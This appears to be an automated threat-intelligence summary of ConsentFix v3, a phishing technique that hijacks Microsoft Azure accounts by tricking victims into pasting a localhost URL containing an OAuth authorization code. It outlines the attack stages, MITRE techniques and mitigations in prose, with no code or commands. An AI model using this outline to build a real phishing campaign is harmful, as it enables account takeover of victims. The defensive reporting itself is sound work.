Automated ConsentFix v3 Attack Targets Microsoft Azure Accounts

Severity: High (Score: 69.5)

Sources: Bleepingcomputer, Scworld

Summary

A new attack technique named ConsentFix v3 has emerged, automating the hijacking of Microsoft Azure accounts through sophisticated phishing methods. This attack builds on previous versions by enhancing automation and scalability to bypass security measures. It utilizes social engineering and exploits the OAuth2 authorization code flow to gain unauthorized access to user accounts. Attackers first identify valid tenant IDs and gather employee details for impersonation. They create multiple accounts across various services, leveraging Pipedream as a central tool for automation. The phishing scheme involves a page hosted on Cloudflare that mimics the Microsoft/Azure interface, tricking victims into pasting a localhost URL containing an OAuth authorization code. Once the code is captured, it is exchanged for tokens that grant access to compromised environments. The full impact of this attack is still being assessed, and mitigation strategies are recommended. As of now, it is unclear if this variant has gained widespread adoption among cybercriminals. Key Points: • ConsentFix v3 automates Microsoft Azure account hijacking using OAuth2 exploitation. • Attackers impersonate employees by gathering details and creating multiple service accounts. • Mitigation strategies include token binding and behavioral detection rules.

Key Entities

• Phishing (attack_type)
• ConsentFix (campaign)
• Microsoft (company)
• Azure (company)
• Microsoft Azure (company)
• Outlook (company)
• hunter.io (domain)
• T1041 - Exfiltration Over C2 Channel (mitre_attack)
• T1078 - Valid Accounts (mitre_attack)
• T1566.002 - Spearphishing Link (mitre_attack)
• Azure CLI (tool)
• DocSend (tool)
• Pipedream (tool)
• Specter Portal (tool)
• Tutanota (tool)
• Cloudflare Pages (platform)